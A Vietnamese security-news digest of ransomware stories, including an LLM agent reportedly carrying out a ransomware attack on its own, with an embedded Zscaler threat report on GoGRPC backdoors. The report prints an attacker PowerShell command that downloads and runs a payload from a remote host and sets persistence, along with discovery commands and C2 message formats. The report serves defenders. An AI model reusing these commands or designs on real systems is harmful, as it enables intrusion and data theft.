Một nhóm nghiên cứu của Sysdig phát hiện chiến dịch ransomware JadePuffer do AI agent (LLM) điều khiển hoàn toàn, khai thác lỗ hổng CVE-2025-3248 trong Langflow để xâm nhập, sau đó tự động thực hiện các bước tấn công như trinh sát, đánh cắp thông tin đăng nhập, di chuyển ngang, thiết lập persistence, leo thang đặc quyền và mã hóa dữ liệu 1.342 mục cấu hình Nacos bằng MySQL's AES_ENCRYPT(). Khóa mã hóa không được lưu hay truyền đi, còn địa chỉ Bitcoin trong lời đe dọa có vẻ là dữ liệu huấn luyện.
Lập trình viên nên đọc bài này để hiểu cách các nhóm tấn công hiện đại đang tích hợp trí tuệ nhân tạo vào các chiến lược tấn công phức tạp, từ khai thác lỗ hổng đến tự động hóa các bước tấn công toàn diện, và cách bảo vệ hệ thống trước những "nhóm tấn công đại lý" (agentic threat actors) mới nổi.
JADEPUFFER, một nhóm tấn công agentic do Sysdig Threat Research Team phát hiện, giờ đây triển khai ransomware nhằm phá hủy các mô hình AI đã huấn luyện.
Lập trình viên nên đọc bài này để hiểu cách các nhóm hacker đang tích hợp công nghệ ransomware vào hệ thống AI, đe dọa tính toàn vẹn và hiệu suất của các mô hình học máy trong các ứng dụng doanh nghiệp và công nghệ hiện đại.
Các nhóm ransomware hiện đại thường xuyên thay đổi tên và tái cấu trúc hoạt động thay vì duy trì một danh tính cố định.
Lập trình viên nên đọc bài này để hiểu cách các nhóm tấn công ma trận hóa tên mã hóa, giúp họ tránh bị truy tìm và xây dựng chiến lược phòng thủ thông minh hơn trước các cuộc tấn công mới.
Các nhà nghiên cứu của Sysdig đã ghi nhận JadePuffer, chiến dịch ransomware đầu tiên được thực thi hoàn toàn bởi một tác nhân LLM mà không cần sự can thiệp của con người. Kẻ tấn công khai thác CVE-2025-3248 (lỗ hổng RCE không cần xác thực trong Langflow) để xâm nhập máy chủ MySQL sản xuất, đánh cắp dữ liệu, xóa cơ sở dữ liệu và để lại lời đe dọa tống tiền, với khả năng phục hồi nhanh chóng sau thất bại.
Lập trình viên nên đọc bài này để hiểu cách một hệ thống AI tự động hóa tấn công phức tạp, từ khai thác lỗ hổng đến phá hủy dữ liệu, và nhận thức về nguy cơ mới khi các công cụ tự động hóa của AI được sử dụng trong cybercrime.
Năm 2026, những mối đe dọa mạng nguy hiểm bao gồm lừa đảo bằng AI, giọng nói deepfake, ransomware tống tiền kép, rủi ro từ cấu hình sai trên cloud, tấn công thiết bị di động, tái sử dụng mật khẩu, kỹ thuật xã hội tinh vi và tấn công chuỗi cung ứng. Để phòng tránh, người dùng nên sử dụng quản lý mật khẩu, bật xác thực đa yếu tố (MFA), cập nhật thiết bị thường xuyên và cẩn trọng khi nhấp vào liên kết.
Lập trình viên nên đọc bài này để hiểu cách bảo vệ hệ thống và ứng dụng của mình trước những mối đe dọa mới nổi từ AI, ransomware và các tấn công phức tạp, từ đó xây dựng các giải pháp bảo mật hiệu quả và phòng ngừa trước các cuộc tấn công trong tương lai.
Nhóm tấn công ransomware thường nhắm vào các quản trị viên IT tuổi 40 thay vì CEO, vì họ có quyền truy cập hệ thống quan trọng. Những người thuộc thế hệ Gen X có thể tự bảo vệ bằng cách ngắt kết nối mạng và báo cảnh sát.
Lập trình viên nên đọc bài này để hiểu rõ cách tấn công ransomware hiện đại thường nhắm vào những đối tượng có quyền truy cập trung tâm trong tổ chức, từ đó nâng cao kiến thức bảo mật để bảo vệ hệ thống và dữ liệu của doanh nghiệp.
Các cuộc tấn công ransomware gia tăng khi thế giới đang tập trung vào AI.
Một lập trình viên nên đọc bài này vì ransomware đang phát triển nhanh nhẹn bằng cách kết hợp với công nghệ AI, khiến các cuộc tấn công trở nên tinh vi hơn, khó phòng ngừa và cần kiến thức mới để bảo vệ hệ thống của mình.
Các mối đe dọa ransomware tại châu Âu đã gia tăng đáng kể vào năm 2026, với những mô hình tấn công và các tác nhân chủ chốt được tiết lộ qua nghiên cứu của Cyble Research and Intelligence Labs.
Những thông tin mới nhất về các cuộc tấn công mã ransomware ở châu Âu năm 2026 sẽ giúp bạn dự đoán và phòng ngừa các mối đe dọa mới, từ đó nâng cao khả năng bảo mật cho dự án hoặc công ty của bạn.
Các đối tượng đe dọa đã thích nghi chiến lược, trong khi cơ quan thực thi pháp luật vẫn hoạt động theo cách biệt lập, khiến cuộc chiến chống tội phạm mạng ngày càng khó theo kịp.
Lập trình viên nên đọc bài này để hiểu cách hacker exploit các lỗ hổng trong hệ thống an ninh hiện đại, giúp họ dự đoán và phòng ngừa các cuộc tấn công mới trước khi chúng trở thành vấn đề thực tế.
Nỗi lo về "kill switch" do chính phủ áp đặt cắt truy cập vào các nhà cung cấp cloud Mỹ (73,9%) đã ngang ngửa với nỗi sợ ransomware (74,9%) đối với doanh nghiệp châu Âu. Hơn nửa doanh nghiệp chỉ có thể hoạt động dưới 1 ngày nếu mất dịch vụ cloud, nhưng chỉ 44% có kế hoạch khôi phục đã được ghi chép và kiểm tra thường xuyên. Thiệt hại tài chính lớn khi 28,7% doanh nghiệp lớn dự kiến mất hơn 100.000 euro mỗi ngày ngừng hoạt động. Proton khuyến nghị sử dụng failover dự phòng trên hạ tầng châu Âu thay vì phụ thuộc vào các nhà cung cấp backup Mỹ.
Lập trình viên nên đọc bài này để hiểu cách xây dựng hệ thống cloud an toàn hơn, tránh rủi ro từ chính sách kill switch và ransomware, bằng cách lựa chọn giải pháp backup và failover trên hạ tầng châu Âu, giảm thiểu tổn thất tài chính và bảo vệ dữ liệu lâu dài.
Tác giả của Ransom Cartel, Maksim Silnikau, bị kết án 16 năm tù vì tham gia tấn công ransomware nhắm vào ít nhất 18 công ty toàn cầu.
Đọc bài này để hiểu rõ về những hậu quả nghiêm trọng của tội phạm cyber như ransomware và cách các tổ chức, doanh nghiệp cần chuẩn bị phòng ngừa để bảo vệ dữ liệu và hoạt động kinh doanh.
Một cuộc tấn công dựa trên thông tin đăng nhập (credential-based attack) thường diễn ra trong vòng 72 giờ, bắt đầu từ việc đánh cắp mật khẩu, xâm nhập ban đầu, di chuyển ngang, đánh cắp dữ liệu cho đến quá trình ứng phó sự cố.
Lập trình viên cần đọc bài này để hiểu rõ cách kẻ tấn công exploit các lỗ hổng cơ bản trong hệ thống bảo mật, từ đó giúp phát triển các giải pháp bảo vệ an toàn hơn cho ứng dụng và cơ sở dữ liệu của bạn.
Tin tặc ExfilSquad tấn công cơ sở dữ liệu pháp lý quốc gia của cảnh sát Anh (PNLD), đánh cắp dữ liệu liên hệ của hơn 100.000 sĩ quan cảnh sát và nhân viên ngành tư pháp hình sự.
Lập trình viên nên đọc bài này để hiểu về các rủi ro bảo mật dữ liệu thực tế từ các hệ thống quản lý công cộng, giúp họ nâng cao kiến thức về bảo mật ứng dụng và phòng ngừa các cuộc tấn công như xâm nhập dữ liệu lớn.
Chuyên gia Kaspersky chia sẻ số liệu thống kê và phân tích các trường hợp ứng phó sự cố tại các cơ sở giáo dục ở Brazil, đồng thời đưa ra lời khuyên giúp trường học và đại học bảo vệ hệ thống an toàn.
Một lập trình viên nên đọc bài này để hiểu cách bảo mật hệ thống trong môi trường giáo dục Brazil—và từ đó áp dụng kiến thức về phản ứng khi xảy ra rò rỉ dữ liệu, tấn công mạng hoặc vi phạm an ninh trong các dự án hoặc doanh nghiệp của mình.
Lãnh đạo cấp cao thường sai lầm khi chỉ đầu tư vào phòng ngừa rủi ro mạng thay vì chuẩn bị cho hàng tuần downtime có thể đe dọa doanh nghiệp. Arctic Wolf nhấn mạnh tầm quan trọng của khả năng phục hồi (resilience) so với biện pháp phòng ngừa (prevention).
Lập trình viên nên đọc bài này để hiểu cách hệ thống an ninh kỹ thuật không chỉ bảo vệ chống lại tấn công mà còn phải chuẩn bị cho những thời gian ngừng hoạt động không ngờ đến, giúp tối ưu hóa hiệu suất và giảm thiểu rủi ro từ các lỗ hổng kỹ thuật.
ESET báo cáo mối đe dọa mới nổi cho thấy tội phạm mạng đang kết hợp kỹ năng AI độc hại, malware hỗ trợ AI, tấn công ClickFix, hoạt động quishing kỷ lục và công cụ ransomware nhằm vô hiệu hóa phần mềm bảo mật.
Lập trình viên nên đọc bài này để hiểu cách hacker đang tích hợp trí tuệ nhân tạo vào các công cụ tấn công, từ đó có thể bảo vệ hệ thống của mình bằng kiến thức mới về các kỹ thuật tấn công phức tạp như AI-assisted malware và ClickFix, giúp nâng cao khả năng phòng thủ trước các mối đe dọa ngày càng tinh vi.
Tấn công vishing (lừa đảo qua điện thoại/video) trên Microsoft Teams giả mạo nhân viên IT để chiếm quyền truy cập từ xa vào thiết bị doanh nghiệp, sau đó triển khai ransomware Chaos nhắm vào các tổ chức Bắc Mỹ.
Lập trình viên phải hiểu về phân tích mã và bảo mật ứng dụng để phát hiện các lỗ hổng trong giao thức Teams, từ đó đề xuất giải pháp phòng ngừa và bảo vệ hệ thống trước các cuộc tấn công phishing giả mạo.
Kaspersky phát hiện biến thể ransomware mới GenieLocker nhắm vào hệ điều hành Windows, Linux và ESXi, được sử dụng bởi nhóm tấn công có động cơ tài chính Toy Ghouls.
Lập trình viên nên đọc bài này để hiểu cách GenieLocker – một loại virus ransomware đa nền tảng (Windows, Linux, ESXi) – có thể khai thác lỗ hổng trong hệ thống, từ đó xây dựng kiến thức phòng ngừa và bảo mật cho ứng dụng, server, hoặc hệ thống của riêng mình.
Các tổ chức cần ngăn chặn tình trạng tống tiền bằng AI và rò rỉ dữ liệu giả mạo bằng cách xác minh tính xác thực thông qua quản trị chặt chẽ và trí thông minh về mối đe dọa.
Một lập trình viên nên đọc bài này để hiểu cách bảo vệ hệ thống của mình trước các cuộc tấn công giả mạo bằng AI, từ đó nâng cao kiến thức về xác thực dữ liệu và phòng ngừa ransomware giả mạo trong môi trường công nghệ hiện đại.
Việc ưu tiên khắc phục lỗ hổng bảo mật (vulnerability prioritisation) đang trở nên quan trọng nhằm tăng cường khả năng an ninh mạng (cyber security) và khả năng phục hồi (cyber resilience) của tổ chức.
Một lập trình viên nên đọc bài này để hiểu cách xây dựng hệ thống an ninh mạng hiệu quả bằng cách ưu tiên xử lý các lỗ hổng nguy hiểm nhất trước, giúp bảo vệ ứng dụng và dữ liệu của bạn trước các cuộc tấn công ngày càng phức tạp.
Năm 2025, các vụ vi phạm dữ liệu y tế đạt kỷ lục 772 vụ nhưng số người bị ảnh hưởng giảm xuống còn 61,6 triệu, từ mức 289 triệu năm trước. Sự chênh lệch này cho thấy số vụ vi phạm và thiệt hại không tương quan trực tiếp, bởi một vụ lớn có thể thay đổi toàn bộ dữ liệu năm.
Lập trình viên nên đọc bài này để hiểu cách hệ thống quản lý dữ liệu y tế (như HHS OCR) phản ánh thực tế về rủi ro bảo mật, giúp họ thiết kế giải pháp bảo vệ dữ liệu hiệu quả hơn bằng kiến thức về phân tích sự khác biệt giữa số lượng vụ rò rỉ và người bị ảnh hưởng.
Năm 2025, công ty dịch vụ thanh toán y tế MCBS bị tấn công mạng, làm lộ thông tin nhạy cảm của hơn 1,26 triệu người.
Lập trình viên nên đọc bài này để hiểu về cách bảo mật dữ liệu trong hệ thống y tế, từ đó cải thiện kiến thức về bảo vệ hệ thống khỏi tấn công, đặc biệt là khi xử lý dữ liệu cá nhân quan trọng như thông tin y tế.
IntroductionZscaler ThreatLabz has been tracking attacks from a threat actor that is likely an initial access broker for ransomware attacks since January 2026. The threat actor targets organizations by leveraging vishing techniques through Microsoft Teams and deploying a variety of tools including a Go-based backdoor that we named GoGRPC. ThreatLabz has identified at least four variants of GoGPRC that we named Lep, Giver, Pet, and Kind. In some instances, the threat actor has deployed additional malware tools that include a backdoor that we named BlindDoor, a Go-based reverse SOCKS proxy we named RevSocket, a Python-based reverse SOCKS proxy we named PyGRPC, and two other tools we named S3Siphon and RSOX.In this blog post, ThreatLabz examines the four GoGRPC variants, highlighting where they overlap and how they differ. We also analyze their command-and-control (C2) communication protocols and summarize the additional malware tools observed in these campaigns. Key TakeawaysSince January 2026, ThreatLabz tracked a cluster of attacks likely associated with a ransomware group that begins with targeted vishing via Microsoft Teams, convincing the victim to launch a Quick Assist remote support session.After initial access, the threat actors use PowerShell scripts to gather host information and deploy a Go-based backdoor that we named GoGRPC and/or other malware tools.ThreatLabz observed four variants of GoGRPC that we named Lep, Giver, Pet, and Kind. These variants have overlapping capabilities but notable implementation differences.GoGRPC is actively evolving. Each variant modifies its payloads and capabilities, adding or removing functionality to better support the threat actor’s objectives. Recent changes indicate an increased targeting of corporate environments, which may be tied to ransomware attacks.GoGRPC communicates with the C2 server using gRPC, which differs from common C2 frameworks where gRPC is typically used for internal communication between components.The threat actor also deploys SOCKS proxy tools that also use gRPC or WebSockets to communicate with the C2 server. Initial CompromiseThe initial compromise by this threat actor likely starts with spam bombing the victim’s inbox. This assessment is based on similar campaigns that ThreatLabz has observed (such as Payouts King and other campaigns reported by Microsoft). These vishing attacks use Microsoft Teams, with the threat actor posing as IT/helpdesk staff offering assistance. The objective is to persuade the victim to open a Quick Assist link to establish a remote session that leads to the follow-on activity described in this blog. Attack FlowThe figure below provides a high-level overview of the attack flow, including the GoGRPC backdoor variants and additional malware tools. Figure 1: High-level campaign attack flow and associated tooling for GoGRPC. Differences Between GoGRPC VariantsThreatLabz tracks the four Go-based backdoor variants as Lep, Giver, Pet, and Kind. We use these labels for consistency across reporting, but the names do not always appear verbatim in the binaries. The following figure below shows the function trees for each of these variants.Figure 2: Function trees for GoGRPC backdoor variants.In many samples, the Go module/library “root” name is randomized. In addition, Pet (and later Kind) typically go further by obfuscating method names, variable names, and structure attributes which makes code comparisons more tedious. The table below summarizes the most relevant differences ThreatLabz observed among these GoGRPC variants:AttributeLepGiverPetKindFirst seenJanuary 6, 2026February 19, 2026April 16, 2026June 2, 2026Fingerprinting capabilitiesYesYesNoNoAgent ID based on victim’s systemYesYesNo, user ID is hardcoded in the sampleNo, same as Pet variantCapable of hiding itselfYes, by using attribNoNoNoMultiple serversNo, one hardcoded server YesNo, one hardcoded server No, one hardcoded server Native proxy command (defined but not implemented)YesYesNoNoUnique instance checksYes, via mutexYes, via mutexNoNoMethod and variable name obfuscationNoNoYesYesTLS supportNoNoYesYesgRPC protocol definition obfuscatedNoNoNoYesExecution without timeoutNoYesYesYesTable 1: Capability comparison between GoGRPC variants. Technical AnalysisThe following section describes the GoGRPC variants including their capabilities and their C2 communication methods, and examines additional malware tooling observed in these campaigns.After establishing a Quick Assist remote session on the victim’s system, the threat actor launches a PowerShell command that downloads and executes GoGRPC using a command similar to the example shown below:$l=RANDOM;$u="hXXps://re102.fastwinnowcom/download/link";$p="$env:APPDATAsekv$l.exe";Invoke-WebRequest $u -OutFile $p;Unblock-File $p;Start-Process $p;Set-ItemProperty -Path "HKCU:SoftwareMicrosoftWindowsCurrentVersionRun" -Name "Realtek HD Audio" -Value $p; Remove-Item (Get-PSReadlineOption).HistorySavePathThe PowerShell command above also establishes persistence by creating a registry Run value to start when a user logs in.After GoGRPC is launched, the codeBase64 decodes one or more hardcoded IP addresses (depending on the variant) for C2 communications. Next, GoGRPC creates the file %PROGRAMDATA%appscreenappscreen.log which is used as an execution log (in all but the most recent variant). The Lep and Giver GoGRPC variants also check whether another instance is running via a hardcoded mutex name that differs across variants and follows the format Global. GoGRPC then begins a system fingerprinting process by executing the following commands:C:Windowssystem32reg.exe query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v CurrentMinorVersionNumber C:Windowssystem32reg.exe query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v CurrentMajorVersionNumber C:Windowssystem32reg.exe query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName C:Windowssystem32reg.exe query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v CSDVersion C:Windowssystem32reg.exe query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ReleaseID C:Windowssystem32reg.exe query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v CurrentBuildThese commands retrieve information about the victim’s Windows system, including the Windows version and current build. On legacy Windows systems, the commands collect the installed Service Pack and the Release ID.GoGRPC also gathers other information such as the computer name, user name, machine GUID (used as an agent ID value), and hostname. This information is stored in an internal data structure as shown below:struct main_Agent{ string agentID; string osName; string hostName; string compName; string userName; string domainName; string arch; map_string_string tags; string sessionID; time_Duration heartbeatEvery; _ptr_log_Logger logger; uint64 mut; };GoGRPC then registers with the C2 server and waits for commands to execute. The commands ThreatLabz observed included discovery and enumeration tasks, as shown below.powershell systeminfo ; whoami /groups ; net user "$env:UserName" /domain ; echo AD_Computers: ("(ObjectClass=computer)").FindAll().count ; nltest /domain_trusts powershell Get-CimInstance -Namespace "root/SecurityCenter2" -ClassName "AntiVirusProduct" -ErrorAction Stop attrib +h +s C:Users*******·Windo 0040 77 73 20 31 30 20 50 72 6f 20 31 39 30 34 34 32 ws 10 Pr o 190442 0050 05 61 6d 64 36 34 ·amd64The C2 server replies with a RegisterResponse message with either a session ID string if the request is valid, or returns an error message. The protobuf definition for the response is shown below.message RegisterResponse { .agent.Status status = 1; oneof result { .agent.Error error = 2; string session_id = 3; } }The figure below shows a successful RegisterResponse with the session ID that will be used in subsequent messages. 0000 08 01 1a 20 62 36 37 39 62 62 35 35 32 37 62 62 ··· b679 bb5527bb 0010 35 66 35 64 61 66 36 39 31 66 39 37 39 32 37 39 5f5daf69 1f979279 0020 33 31 38 64 318dAfter the connection is established, GoGRPC sends heartbeat messages periodically to maintain the connection.GoGRPC commandsTwo protobuf command message types are defined for GoGRPC C2 server communication, as shown below.message Command { uint64 command_id = 1; int64 issued_at = 2; oneof payload { .agent.ExecuteCommand execute = 3; .agent.EstablishConnection connect = 4; } }After a command message is received from the C2 server and executed, GoGRPC sends a result message with the protobuf definition shown below:message CommandResult { uint64 command_id = 1; .agent.Status status = 2; oneof result { .agent.Error error = 3; .agent.ExecuteCommandResult execute = 4; .agent.EstablishConnectionResult connect = 5; } } enum Status { STATUS_UNSPECIFIED = 0; SUCCESS = 1; ERROR = 2; } enum ErrorCode { ERROR_CODE_UNSPECIFIED = 0; INVALID_COMMAND = 1; PERMISSION_DENIED = 2; EXECUTION_FAILED = 3; TIMEOUT = 4; }There are two main types of commands supported by GoGRPC, which can execute arbitrary shell commands or establish a proxy connection. To execute shell commands, the C2 server sends ExecuteCommand messages in one of the following protobuf formats, depending on the variant://Giver, Pet and Kind variants message ExecuteCommand { string command = 1; uint32 timeout_seconds = 2; } or //Lep variant message ExecuteCommand { string interpreter = 1; string command = 2; uint32 timeout_seconds = 3; }GoGRPC executes the ExecuteCommand command via the Go os/exec library. The malware collects stdout and stderr, along with the exit code, and sends the results back to the C2 server. The result protobuf message format is shown below.message ExecuteCommandResult { int32 exit_code = 1; bytes stdout = 2; bytes stderr = 3; }There is an EstablishConnection command designed to proxy network traffic that is defined in the Lep and Giver variants. However, the code to relay network traffic does not appear to have been implemented.The code only defined the protobuf structure below.message EstablishConnection { string protocol = 1; string address = 2; bool encrypted = 3; }The code also defined a result protobuf message using the following format.message EstablishConnectionResult { bool connected = 1; string details = 2; }This command is no longer defined in more recent variants (Pet and Kind) of GoGRPC.If GoGRPC encounters errors while processing commands, it sends a CommandResult message of type error. Error codes are also defined, as shown below.message Error { .agent.ErrorCode code = 1; string message = 2; } enum ErrorCode { ERROR_CODE_UNSPECIFIED = 0; INVALID_COMMAND = 1; PERMISSION_DENIED = 2; EXECUTION_FAILED = 3; TIMEOUT = 4;Additional malware tools observedIn addition to GoGRPC, ThreatLabz identified the threat actor deploying other tooling depending on the victim’s environment. One of the tools we observed in early January is a backdoor that we named BlindDoor. After decoding the C2 IP address hardcoded in the binary, the backdoor sends a READY message to notify the C2 server that the backdoor is running. The C2 server then sends packets containing one or more commands, separated by newline characters, to be executed on the victim’s system. After each command is executed, the backdoor responds with an OK message.This response does not include any output or other data. The backdoor also attempts to keep the communication active and to reestablish the connection if the socket closes. The communication protocol is shown in the figure below. Figure 3: Communication protocol used by BlindDoor.Another tool deployed by the threat actor is a malware family that we named S3Siphon. S3Siphon is a utility that iterates through specific directories and exfiltrates files by uploading them to an AWS S3 bucket using HTTPS PUT requests with the user agent BackupAgent/1.0. This data theft is likely used later to extort organizations for a ransom.The target folders hardcoded in S3Siphon are listed below:DesktopPicturesOneDriveDocumentsVideosDownloadsMusicS3Siphon filters files larger than 100MB and files with the following extensions: .tmp, .temp, .log, .cache, .db, .dll, .exe, .sys, and .lnk. It also excludes files located in the following paths:appdata/local/microsoft/windows/inetcacheappdata/local/microsoft/windows/inetcookiesappdata/local/microsoft/windows/historyappdata/local/microsoft/windows/temporary internet filesappdata/local/microsoft/cryptneturlcacheappdata/local/tempappdata/locallow/microsoft/cryptneturlcacheappdata/roaming/microsoft/windows/recentappdata/local/packagesappdata/local/microsoft/windowsapps__pycache__cache.cacheWindowsprogram filesprogram files (x86)programdata$recycle.binSince June 2026, the threat actor has been deploying the Kind GoGRPC variant and other new malware tooling (including RevSocket, PyGRPC, and RSOX). However, the threat actor appears to be more selective in targeting with the use of more sophisticated PowerShell scripts to assess the potential value of the victim and environment before proceeding.In the initial stage, the threat actor downloads additional PowerShell scripts tailored for corporate environments. These scripts provide capabilities such as:Antivirus (AV) and endpoint detection and response (EDR) detectionDomain controller and corporate environment fingerprintingSystem reconnaissance, data collection, and exfiltrationSecond stage payload delivery, including downloading, executing, and creating persistence via a registry keyThreatLabz has also observed some PowerShell scripts dropping a Go-based reverse SOCKS proxy that we named RevSocket instead of GoGRPC. The proxy opens a WebSocket connection over TLS to a hardcoded C2 server. Once the connection is established, the threat actor can tunnel TCP traffic through the compromised host. To create several tunnels, the proxy uses yamux to multiplex sessions.The proxy first decodes the C2 address and constructs the WebSocket URL wss:///ws. It then loads an embedded certificate to establish the TLS transport, enabling certificate pinning and helping prevent man-in-the-middle (MitM) attacks. After the WebSocket tunnel is established, the proxy receives requests to create new tunnels. For each request, it uses net.Dial to create a TCP connection to the requested destination. The connection request packets follow the format below:|Host Type|Host|Port| 0 1 n n+2 where: Host Type = 1 for IPV4 (host will be 4 bytes) Host Type = 3 for domain_name (host will be 1-byte-length + domain_name) Host Type = 4 for IPV6 (host will be 16 bytes)ThreatLabz also observed another tool, named PyGRPC, which was a compiled Python reverse SOCKS proxy, protected by Pyarmor. This proxy communicates with the C2 server using gRPC over TLS like the Pet and Kind backdoor variants. In addition to the commands used to establish and close tunnels, the proxy also supports a command to generate a reconnaissance report and send it to the C2 server. This proxy is more complex than the threat actor’s other SOCKS proxy tools and uses AES as an additional layer of encryption to its message payloads.In the most recent campaigns observed by ThreatLabz, the threat actor is using payloads dropped after the initial stage as Microsoft Installer (MSI) files that install and execute a tool that we named RSOX .RSOX is a Rust-based tool that acts as a SOCKS proxy relay. It uses WebSockets over TLS to establish connections to a C2 server. The C2 server is obtained from the RSOX_SERVER_URL environment variable if set, otherwise it is obtained by decoding a hardcoded C2 server in the code. This allows the threat actor to reconfigure the C2 server if needed. RSOX also uses a token for authentication, either hardcoded in the binary or retrieved from the RSOX_TOKEN environment variable.RSOX uses JSON, serialized using the Rust serde library, for C2 communication. The message structure has the following format: { “msg”: , “data”: }A list of the C2 commands and their descriptions is provided below:Command (msg)Payload (fields)DescriptionHellotokenhostnameusernameThe handshake message is generated by RSOX right after the WebSocket connection is established.EnableSocksNoneThe response from the Hello command. It instructs RSOX to activate the SOCKS proxy subsystem.SocksReadyNoneSent by RSOX to signal that it is ready to receive SOCKS connections.SocksConnectstream_idhostportThe C2 server instructs RSOX to open a TCP connection to the host:port target.SocksConnectedstream_idok Reports the result of a SOCKS connection attempt back to the C2 server. The ok field is true if the connection succeeded and false if it failed.SocksDatastream_idpayloadForwards data between the C2 server and the remote endpoint for a given stream. The payload field contains Base64-encoded data or a raw string.SocksClosestream_idInstructs RSOX to close a TCP connection or notifies the C2 server when a connection is closed.PingNonePeriodic heartbeat to maintain the WebSocket connection.DisableSocksNonePrevents RSOX from accepting new connections; existing tunnels continue operating.KillNoneInstructs RSOX to shut down all tunnels and exit.Table 2: C2 commands supported by RSOX. ConclusionFrom January through June 2026, ThreatLabz examined a cluster of related campaigns that used Microsoft Teams vishing and Quick Assist for initial access, followed by PowerShell-based staging. Post-compromise, the threat actor deployed GoGRPC along with various backdoor and proxying tools. Since the beginning of the year, the threat actor’s tooling has increased in sophistication, with more recent activity appearing to be more selective and increasingly focused on corporate environments. Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to GoGRPC variants at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for GoGRPC:Figure 4: Zscaler Cloud Sandbox report for GoGRPC. Indicators Of Compromise (IOCs)IndicatorDescription66b2b22397cea219266afb8cbbb28fe93997c1444f642a183ac8fc9ca1fabed5SHA256 Giver backdoor9136ffb749c6cec13b826cd4f25ffdcf170375889feba9fee28dd74c32578f52SHA256 Lep backdoor7dcabb6d07d52b92bbf8d659d1ed373fa780e7839fd3d744826a56fc1cd2372fSHA256 Giver backdoor35ea50f16bd5c080c91dbaa3dd4937408ed9563c1d9aa1cd0c751ae58db0eedcSHA256 Pet backdoor (TLS)759287052b8cc4f4ce16065857cbc9dba72aab218e709d3419483a95092c6f96SHA256 Pet backdoor (TLS)f36bfccf944b5d1e5e306958c1a728e38786c042ee4e536cc44c9d43940b1121SHA256 Kind backdoor (TLS)51edd14233483bcf36e0b0f31451f28eac681fe3f2036f76c02b7ec1bb17ce33SHA256 Kind backdoor (TLS)5d53246b0e6b681bc624739a7bead39a61fb07c0f4474b8170112e829c053f85SHA256 RevSocket (alone)65af5c3ba2d00967b25b9165d2d3171fa81f209ee0790299805bb907d492a670SHA256 PyGRPC and reconnaissance 41748648b71a70431123ec48e38868ff8aad3a7a06f5d781c2d2a4f718e7fd91SHA256 MSI dropping RSOXf85960dee17ba587b712cd8cdf89042bcd6ba711c3d5d548bef7c7f0988413f5 SHA256 RSOXscansec-updcomC2 server deploying toolsre2.filesdwnloadtopC2 server deploying tools (April)re8.dowlflesonlineC2 server deploying tools (May)update19.upldfonlineC2 server deploying tools (June)5.253.59.222Lep C2 server94.140.114.192Giver C2 server193.29.57.37Pet C2 server45.86.162.228Kind C2 server (June)46.30.191.126RevSocket C2 server (May)46.30.191.60RevSocket C2 server (June)185.82.126.91S3Siphon C2 server (Jan)xeds.geranteeg.onlineRSOX C2 server (June)
Báo cáo DBIR 2026 của Verizon chỉ ra 48% vụ xâm phạm dữ liệu liên quan đến ransomware, nguyên nhân do thiếu quyền rõ ràng trong việc ngắt hệ thống, khiến kế hoạch ứng phó bị vô hiệu hóa; ba giải pháp theo tiêu chuẩn NIST có thể khắc phục.
Một lập trình viên cần đọc bài này để hiểu cách bảo mật hệ thống chống lại ransomware không chỉ phụ thuộc vào kỹ thuật mà còn liên quan đến quy trình quản lý và phân quyền, giúp họ thiết kế giải pháp an toàn hơn từ góc nhìn cả kỹ thuật lẫn quản lý.
OnTrac parcel delivery company is informing that hackers breached its corporate network and may have accessed personal details belonging to its customers.
Ransomware đóng vai trò như bảng điểm đánh giá kiến trúc phòng thủ. Bài viết giải thích tại sao các phương pháp bảo mật truyền thống thất bại và đề xuất sử dụng AI cùng threat intelligence để phát hiện, khắc phục các đường tấn công quan trọng.
Một lập trình viên phải đọc bài này để hiểu cách ransomware không chỉ là một mối đe dọa trực tiếp mà còn là "điểm số" cho hệ thống bảo mật của bạn—nếu hệ thống yếu, kẻ tấn công sẽ dễ dàng chiếm điểm, khiến việc khôi phục dữ liệu trở nên đắt đỏ và khó khăn hơn bao giờ hết.
Nhóm ransomware Clop đang tấn công các phiên bản Windchill và FlexPLM của PTC bị lộ trên Internet nhằm đánh cắp dữ liệu trong chiến dịch tống tiền mới.
Lập trình viên chuyên về hệ thống CAD/PLM nên đọc để hiểu cách bảo vệ ứng dụng Windchill và FlexPLM khỏi tấn công ransomware Clop, đặc biệt là các lỗ hổng liên quan đến giao diện web và cách thực hiện kiểm tra bảo mật trước khi triển khai.
Một vụ phản bội từ phía người đàm phán ransomware cho thấy nguy cơ của việc tin tưởng mù quáng và lý do tại sao ứng phó sự cố cần kiểm soát truy cập chặt chẽ.
Một lập trình viên nên đọc bài này để hiểu cách rủi ro từ sự tin tưởng không kiểm soát trong hệ thống bảo mật, đặc biệt khi phát hiện các trường hợp lỗ hổng nội bộ hoặc hành vi gian lận trong quá trình xử lý khẩn cấp.
Bridewell ra mắt dịch vụ tình báo mối đe dọa chuyên biệt BCON Collective, tích hợp các dịch vụ, nghiên cứu gốc và chuyên gia phân tích dưới một thương hiệu duy nhất.
Là người phát triển phần mềm, đọc bài này giúp bạn hiểu cách các tổ chức chuyên nghiệp tích hợp thông tin đe dọa mạng để bảo vệ hệ thống của bạn trước các cuộc tấn công mới, từ đó tối ưu hóa an ninh và phát triển ứng dụng an toàn hơn.
Nghiên cứu mới nhất cho thấy hacker thường đòi thêm tiền nếu nạn nhân trả tiền chuộc lần đầu.
Lập trình viên nên đọc bài này để hiểu rõ cách hacker exploit lỗ hổng bảo mật, từ đó nâng cao kiến thức phòng ngừa rủi ro cho hệ thống ứng dụng, dữ liệu và cơ sở hạ tầng của doanh nghiệp.
Doanh nghiệp triển khai GenAI có thể khuếch đại nguy cơ ransomware khi các trợ lý AI hoặc tác nhân AI thừa hưởng quyền hạn quá mức hoặc danh tính bị xâm phạm. Việc kiểm soát danh tính, quản trị và cấp quyền tối thiểu giúp giảm thiểu rủi ro ransomware dựa trên AI đồng thời hỗ trợ triển khai AI an toàn.
Lập trình viên nên đọc bài này để hiểu cách AI doanh nghiệp có thể trở thành công cụ tấn công ransomware khi không được kiểm soát, và cách áp dụng quyền hạn hạn chế cùng kiểm soát danh tính để bảo vệ hệ thống của bạn.
